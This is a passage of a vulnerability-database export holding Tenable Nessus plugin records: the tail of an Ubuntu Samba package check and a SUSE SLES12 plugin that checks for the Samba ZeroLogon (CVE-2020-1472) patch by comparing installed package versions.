'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libparse-pidl-perl', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libsmbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libsmbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libwbclient-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'libwbclient0', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'python-samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'registry-tools', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-common', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-common-bin', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-dev', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-dsdb-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-libs', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-testsuite', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'samba-vfs-modules', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'smbclient', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'},\n {'osver': '18.04', 'pkgname': 'winbind', 'pkgver': '2:4.7.6+dfsg~ubuntu-0ubuntu2.19'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ctdb / libnss-winbind / libpam-winbind / libparse-pidl-perl / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:28:12", "description": "This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non default configurations when an attacker established a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-12-09T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-23T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap2", "p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs-python3", "p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2020-2720-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2720-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143655);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2720-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nUpdate to 4.10.18\n\nZeroLogon: An elevation of privilege was possible with some non\ndefault configurations when an attacker established a vulnerable\nNetlogon secure channel connection to a domain controller, using the\nNetlogon Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202720-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b504ef0\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SDK-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise Server 12-SP5 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP5-2020-2720=1\n\nSUSE Linux Enterprise High Availability 12-SP5 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP5-2020-2720=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc-binding0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libdcerpc0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-krb5pac0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-nbt0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr-standard0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libndr0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libnetapi0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-credentials0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-errors0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-hostconfig0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-passdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamba-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsamdb0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbconf0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libsmbldap2-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libtevent-util0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libwbclient0-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-client-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debuginfo-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-debugsource-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"samba-libs-debuginfo-32bit-4.10.18+git.208.88201368c52-3.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", 